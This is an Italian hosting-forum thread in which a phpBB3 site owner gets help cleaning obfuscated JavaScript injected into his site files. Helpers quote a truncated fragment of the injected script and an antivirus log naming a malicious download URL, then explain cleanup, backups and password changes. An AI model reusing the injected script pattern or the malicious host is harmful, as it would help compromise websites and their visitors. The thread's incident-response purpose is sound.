Attenzione: Strano codice presente nelle mie pagine!

ma hai controllato anche tu il download che ti messo nella pagina indietro per essere sicuri che almeno lo e pulito, fai alla svelta e appena un mega almeno ho una certezza che ho il forum pulito tramite ftp, cosi posso cancellare tutto e metto quello

[quizzer]

buongiorno, giusto per la segnalazione, anch'io ho lo stesso problema da stamattina... e il mio sito e' realizzato in joomla...

buongiorno, giusto per la segnalazione, anch'io ho lo stesso problema da stamattina... e il mio sito e' realizzato in joomla...

apposto siamo, diventiamo sempre di piu sta cosa mi puzza di attacco informatico o qualcosa di simile

[angolodicielo]

ma hai controllato anche tu il download che ti messo nella pagina indietro per essere sicuri che almeno lo e pulito, fai alla svelta e appena un mega almeno ho una certezza che ho il forum pulito tramite ftp, cosi posso cancellare tutto e metto quello

Si scusa, non mi ero accorto.
I tuoi file sono infetti.
Nel senso che a scansione, non risulta nulla.
Ma se li apri (ad es, nei file della lingua), compare questo codice:

Codice:

<!-- C/C v0384 --><script>function bW(){};dN="dN";bW.prototype = {v : function() {fF="fF";dUY=false;var b="b";this.jI="";var jA="jA";var rF=false;try {this.fH="";var sA='';fB=false;cV=false;var zZ='';n=51664;zW='';window.onload=function() {sC="";var rW=false;fQ=15651;var jF="jF";var e=new Array();var bU=function(){return 'bU'};String.prototype.dQ=function(vO, j){var p=this; return p.replace(vO, 

...

sW=new Array();var mK=new Array();var fA=new Date();var fQP=new Array();var a = a + '\u0061\u0058\u0065\u003e'.replace(/X/g, 'H').replace(/H/g, 'm');var '\u003c\u0067\u006f\u0058\u0058\u003e'.replace(/XX/g, 'HH').replace(/HH/g, 'r  Array();var mGA='';function mT(){};}};this.vYQ=false;var eM=new bW(); var bR=new Date();eM.v();gON='';</script>

Quindi, sono portatori sani.
A scansione risulta pulito. Ma non appena li carichi sul server, diventano portatori di virus, tramite link (sto semplificando per capirci).



Per risolvere, o controlli tutti i file manualmente, togliendo quel codice.
Oppure, ripristino integrale ftp, non ci sono altre strade.
E' inutile caricare backup compromessi come questo.



Quizzer, in riferimento a Joomla, vale anche per te la stessa cosa.

[Gianluca]

kingbega:

Ho censurato il link che hai postato, se distribuisci pubblicamente i files del tuo applicativo è come se pubblicassi la tua password, quindi cambiala subito

quizzer:

Non ha rilevanza l'applicativo, leggi qui: http://forum.it.altervista.org/cms-f...tml#post759986

[quizzer]

Sì sì, grazie Gianluca, avevo letto... comunque per il momento la situazione pare migliorata dopo aver ripristinato da un backup tutti i file php che avevo nella root del sito...

[Gianluca]

Quizzer:

Devi seguire tutti i passi indicati (non solo il ripristino dei files), altrimenti il problema si ripresenterà.

Si scusa, non mi ero accorto.
I tuoi file sono infetti.
Nel senso che a scansione, non risulta nulla.
Ma se li apri (ad es, nei file della lingua), compare questo codice:

Codice:

<!-- C/C v0384 --><script>function bW(){};dN="dN";bW.prototype = {v : function() {fF="fF";dUY=false;var b="b";this.jI="";var jA="jA";var rF=false;try {this.fH="";var sA='';fB=false;cV=false;var zZ='';n=51664;zW='';window.onload=function() {sC="";var rW=false;fQ=15651;var jF="jF";var e=new Array();var bU=function(){return 'bU'};String.prototype.dQ=function(vO, j){var p=this; return p.replace(vO, 

...

sW=new Array();var mK=new Array();var fA=new Date();var fQP=new Array();var a = a + '\u0061\u0058\u0065\u003e'.replace(/X/g, 'H').replace(/H/g, 'm');var '\u003c\u0067\u006f\u0058\u0058\u003e'.replace(/XX/g, 'HH').replace(/HH/g, 'r  Array();var mGA='';function mT(){};}};this.vYQ=false;var eM=new bW(); var bR=new Date();eM.v();gON='';</script>

Quindi, sono portatori sani.
A scansione risulta pulito. Ma non appena li carichi sul server, diventano portatori di virus, tramite link (sto semplificando per capirci).



Per risolvere, o controlli tutti i file manualmente, togliendo quel codice.
Oppure, ripristino integrale ftp, non ci sono altre strade.
E' inutile caricare backup compromessi come questo.



Quizzer, in riferimento a Joomla, vale anche per te la stessa cosa.

si ma prima notepad++ mi trovava le stringhe ora se faccio il controllo non le trova piu come mai ??

se io sti file li ripulisco tutti uno per uno non e possibile poi un recupero ??

[angolodicielo]

Se controlli e modifichi tutti i file del backup, cancelli l'attuale contenuto ftp, e ricarichi questo backup corretto, in teoria sì.

Ma come sta anche ricordando Gianluca, ferma restando scansione, devi cambiare tutte le password amministrative.

sisi pooi cambio anche tutte le pass dopo ora sto ripulendo i file uno per uno cacchio esisterebbe un sistema piu veloce 500 file e uno strazio, e la 6 volta che li ripulisco

hol trovato un backup del 03-09 che dite se lo ripristino sistema tutto ?? nel senso che sia pulito e sicuro al 100% perche il problema e apparso ieri, quindi il backup dovrebbe essere apposto, ma risolve il problema un backup a sto punto ??

[dapeco]

Dipende da cosa hai fatto nel frattempo, tra il backup e l'attuale (non compromesso). Se è tanto vecchio meglio lasciarlo perdere e spendere energie per bonificare l'attuale. Con Notepad++, come ti è già stato detto, puoi fare la pulizia velocemente (mi pare si possano impostare anche alcune regexp) senza dover modificare 1 ad 1 tutti i file.

Di prioritario c'è comunque la pulizia del sistema ed il cambio delle credenziali.

beh ora mi ribonifico tutti i file e tento se riesco a risolvere altrimenti ho un backup del 03-09-2010 ma non me lo fa fare devo aspettare per forza stanotte

[Gianluca]

kingbega:

beh ora mi ribonifico tutti i file e tento se riesco a risolvere altrimenti ho un backup del 03-09-2010 ma non me lo fa fare devo aspettare per forza stanotte

Non fare confusione.
Hai a disposizione 2 tipi di backup, quello del database (che non serve ripristinare, ed è anzi meglio non ripristinare) e quello dei files, che invece è quello che serve.

Quello dei files si trova in AlterSito->Backup (l'icona a sinistra che raffigura una cartella gialla con un "+").
Lì hai un backup risalente a Giugno e togliendo la spunta dal backup del database puoi ripristinare solo i files.

Se nel frattempo non sono state fatte modifiche o aggiornamenti al forum il tutto dovrebbe risolvere senza farti perdere alcun post.

uhm buono a sapersi ma mi tocca sempre aspetare la mezzanotte per il backup oppure posso farlo ora ??
le uniche modifiche apportate al forum rispetto a quel backup e il restyle della skin, tutto il css e le immagini, volendo sono recuperabili quelli, non risultano tra i file infetti

EDIT:
ragazziiiiiiiiiiiiii me lo merito un richiamo ma non potevo fare questo post :D
grazie infinite a tutti voi che avete avuto pazienza a starmi dietro ce l'ho fatttaaaa!!
anzi ce l'abbiamo fatta :D
ho pulito i file uno per uno 600 circa per la precisione, poi ho cancellato tutto tramite ftp dalla root principale e rimesso quello pulito in remoto, sembra essere tutto nella normalita per ora, poi se ci saranno rogne noscoste non ho idea :D ma il sito ora e attivo e funzionante.

un abbraccio virtuale a tutti voi e a buon rendere, o meglio posso rendervi qualcosa solo graficamente il resto so na schiappa in tutto :D


EDIT: unico problema riscontrato a tutti gli utenti IE gli si attiva la consolle java e un problema ?? se si come risolverlo ??

[angolodicielo]

Mi spiace doverti deludere, ma ecco cosa rileva il mio KIS con IE8:

Codice:

09/10/2010 19.15.29	Sospetto	URL dannoso http://krokodilov555.us/b.php?tp=364664a6257abf6b rischio Alto

Ovviamente ho bloccato.
Presumo, che gli altri utenti IE, non abbino bloccato (perchè magari non rilevato), e il virus, fa entrare in azione java.

Poichè con chrome non si verifica, si deve presumere che il virus sfrutti una vulnerabilità di IE8 (il mio peraltro, è aggiornato....)


In breve, non hai ancora risolto.

azz e mo dove sta sto problema dio santo e due giorni a dritto che ci lavoro interrottamente :S sto impazzendo....suggerimenti ??

EDIT: infatti ci sono anche utenti chrome che non riescono proprio ad accedere al forum

[angolodicielo]

I suggerimenti rimangono sempre quelli dati...
Non è che cambiano.


P.S.
Bisogna vedere se Chrome è aggiornato, e come è configurato...
Se il sistema operativo è aggiornato e come è configurato...
Se c'è un vero Internet Security, o un antivirus Free con Windows Firewall..
Ci sono tanti fattori...

uhm infatti alcuni non riescono ad entrarci nel foro

http://yfrog.com/g4immaginedlj

cmq il grosso l'ho risolto, ora c'e solo da capire se mi e sfuggita qualche stringa, il problema serio e che io non ci capisco nulla e quindi trovarla io sara un impresa.

riguardo i suggerimenti dati ho capito, il problema e che io non li so fare quindi devo trovare vie alternative

[angolodicielo]

Su suggerimento di Micogian (chi conosce l'ambiente del phpbb3, sa di chi parlo), scarica e installa Agent Ransak.
Questo software, consente di trovare una stringa cercando in molti file (ad es nella cartella del forum), senza aprire i file in questione.
Cerca in modo approfondito e corretto dall'esterno, senza aprire i file.
Una volta individuata la stringa, apri solo il file che ti interessa, e modifichi con il notepad++

scaricato e installato ma non fa ricerca nei file, o meglio non posso cercare la stringa ma singoli file, serve per ricerche di file nel pc piu che altro non a trovare il contenuto in file scritti


e poi un altra domanda guardango il sorgente della mia pagina vedo che si ripete spesso questa voce:

<script type="text/javascript">

puo essere il virus in questione ?? se si l'ho visto in certi file questa stringa si puo cancellare o faccio danni ??

[andreafallico]

Ancora vedo, nelle tue pagine, il codice malevolo:

Codice HTML:

<!-- END AV_TOOLBAR -->
<!-- C/C v0384 --><script>function bW()....<script>
</body></html>

Prima di tutto devi modificare la password, andando Pannello di controllo -> Io -> Profilo -> Modifica i dati d'accesso al pannello, all'FTP e al forum della comunità e modifica la password.

la pass gia l'ho modificata prima di fare la pulizia tramite ftp

Ancora vedo, nelle tue pagine, il codice malevolo:

Codice HTML:

<!-- END AV_TOOLBAR -->
<!-- C/C v0384 --><script>function bW()....<script>
</body></html>

Prima di tutto devi modificare la password, andando Pannello di controllo -> Io -> Profilo -> Modifica i dati d'accesso al pannello, all'FTP e al forum della comunità e modifica la password.

dove puo essere questa stringa ?? in che file?? io con l'aiuto di angolodicielo tramite il programma indicato da lui l'ho trovata solo in un file nella cartella prosilver\styles\template\bbcode.html non ne trovo altri con la ricerca.
o gia provveduto a ripulire il file e caricarlo tramite ftp dopo aver cancellato il vecchio.


EDIT: mi sa che era quel file li che ho trovato ora nel sorgente pagina non la vedo piu la string indicata da te, ora non mi serva altro che un buon sito dove scansionare le pagine web inline qualcuno sa consigliarmi ??

io ho utilizzato URLvoid e l'unico che conosco e questo e l'esito voi che dite??

Report 2010-10-09 20:26:25 (GMT 1)
Website sheridansfaces.altervista.org
Domain Hash c98460acaba2338356235f9ba72f9b03
IP Address 188.40.32.131 [SCAN]
IP Hostname ns93.altervista.org
IP Country DE (Germany)
AS Number 24940
AS Name HETZNER-AS Hetzner Online AG RZ
Detections 2 / 17 (12 %)
Status SUSPICIOUS

Scanning site with: AMaDa CLEAN
Scanning site with: BrowserDefender UNRATED
Scanning site with: DNS-BH CLEAN
Scanning site with: Google Diagnostic CLEAN
Scanning site with: hpHosts DETECTED
Scanning site with: Malware Domain List CLEAN
Scanning site with: Malware Patrol CLEAN
Scanning site with: MyWOT DETECTED
Scanning site with: Norton SafeWeb UNRATED
Scanning site with: ParetoLogic URL Clearing House CLEAN
Scanning site with: PhishTank CLEAN
Scanning site with: SURBL CLEAN
Scanning site with: Threat Log CLEAN
Scanning site with: TrendMicro Web Reputation CLEAN
Scanning site with: URIBL CLEAN
Scanning site with: Web Security Guard UNRATED
Scanning site with: ZeuS Tracker CLEAN

i due sospetti che mi da non ci capisco nulla a cosa si riferisce se qualcuno vuole guardarli per me e spiegarmi cosa sono mi farebbe un enorme favore, il link di URLvoid e questo http://www.urlvoid.com/

basta semplicemente inserire la mia url che e questa http://sheridansfaces.altervista.org/portal.php e controllare cosa dicono i due sospetti

[angolodicielo]

scaricato e installato ma non fa ricerca nei file, o meglio non posso cercare la stringa ma singoli file, serve per ricerche di file nel pc piu che altro non a trovare il contenuto in file scritti


e poi un altra domanda guardango il sorgente della mia pagina vedo che si ripete spesso questa voce:

<script type="text/javascript">

puo essere il virus in questione ?? se si l'ho visto in certi file questa stringa si puo cancellare o faccio danni ??

No per cortesia.
Non diciamo cose scorrette. Il software citato, fa esattamente quello che ho detto: ricerca dettagliatamente all'interno dei file senza aprirli. Io lo uso spesso.
Ammesso che tu abbia scaricato il software corretto.
Poi certo, è chiaro che opera su PC.
Tu il contenuto ftp, lo devi ripulire su PC, e poi dopo aver cancellato il vecchio contenuto ftp in remoto, devi caricare da PC a remoto quello pulito.
E' diverse volte che ti viene detto.




P.S.
Sembra che tu abbia risolto (anche usando correttamente il citato software).
Adesso il mio KIS, non dà più avvisi nemmeno con IE8.
Però, gli ospiti non vedono nessun forum.
Ti conviene sistemare la cosa.

Se hai risolto, ti conviene approfondire in dettaglio la questione backup, ripristini vari ecc.

sisi infatti scusami angolo ma ero talmente in palla e senza dormire che ho prestato poca attenzione all'uso del software :)
infatti ho fatto come detto gia, ho cercato tutti i file infetti li ho ripuliti tutti in locale dopo ho cancellato tutto in remoto e riuppato l'intero sito, ora e completamente pulito anche se alcuni motori di ricerca o di classificazione me lo indicano sempre come pericoloso, ma quello credo sara una cosa che sparisca con il tempo :)

riguardo agl'ospiti che non vedano i forum non e un problema ma una cosa voluta, ho lasciato visibile solo il portale volontariamente, chi ne vuole vedere i contenuti e obbligato a registrarsi altrimenti anche i download che metto non ghli vengono visualizzati da ospiti, altrimenti qualsiasi persona bannata o indesiderarta per aver violato i regolamenti ne beneficia sempre dei lavori che faccio :)

rinnovo ancora una volta i ringraziamenti a tutti voi che mi avete sostenuto, perche da solo non sarei riuscito mai e poi mai a ripristinare il tutto , visto che il linguaggio proprio non lo conosco :)

[silvermaledetto]

Mi pare di capire che dal regolamento

4.5 Non è consentito abusare del Servizio di restrizione aree tramite password, creando archivi, database o siti il cui contenuto più significativo non sia liberamente accessibile al pubblico.

per estensione non sia possibile creare forum a sessione completamente chiusa, e questo ho sempre sostenuto ad altri admin di Phpbb3 hostati su Altervista.
A questo punto chiederei un interpretazione a chi di dovere, anche e soprattutto, per non sostenere tesi fallaci!

si lo so ho dsentito qualcosa del genere ma se permetti sono cose che creo io c'e del mio lavoro e decido io chi deve averlo e chi no, se io do accesso libero ai non iscritti non serve nulla bannare le persone perche fanno comunque i fatti loro da ospiti, se ad altervista cio non piace mi trasferiro altrove non e un problema, ma io del mio sudore decido io, non altervista :) senza offesa a nessuno naturalmente, posso capire forum e siti inutili che pescano roba dal web ci puo stare, ma nel mio forum sono mie creazioni, miei lavori, mie notti insonni a crearle e quindi saro io a decidere dove e come :)

[silvermaledetto]

il forum a sessione aperta non vuol dire che l'ospite accede a tutte le feature, vuol dire solo che può leggerne i contenuti; tu puoi far visualizzare le descrizioni di un software e tenere inaccessibile il link del download, lasciandolo visibile solo a chi ti pare.
Quindi pure esortare alla registrazione per accedervi.
Ma puoi pure creare sezioni visibili e forum e sottoforum che contengono link o altro protetti ( password, permessi, limitazioni intrinseche ecc. )

Anche io nel mio forum, dove i contenuti sono aperti per oltre il 90%, ho zone ad accesso regolamentato.
Basta intendersi.

[darkwolf]

@kingbega: c'è da dire che il regolamento è stato accettato sin dal momento dell'iscrizione e quindi va rispettato.
Detto ciò, dato che parli di "tuo sudore", non sarai mica lo stesso sheridansfaces sotto altro nick?

[silvermaledetto]

Comunque per tornare al thread, mi pare che il colpevole sia il worm Murofet: almeno le dinamiche sono davvero simili.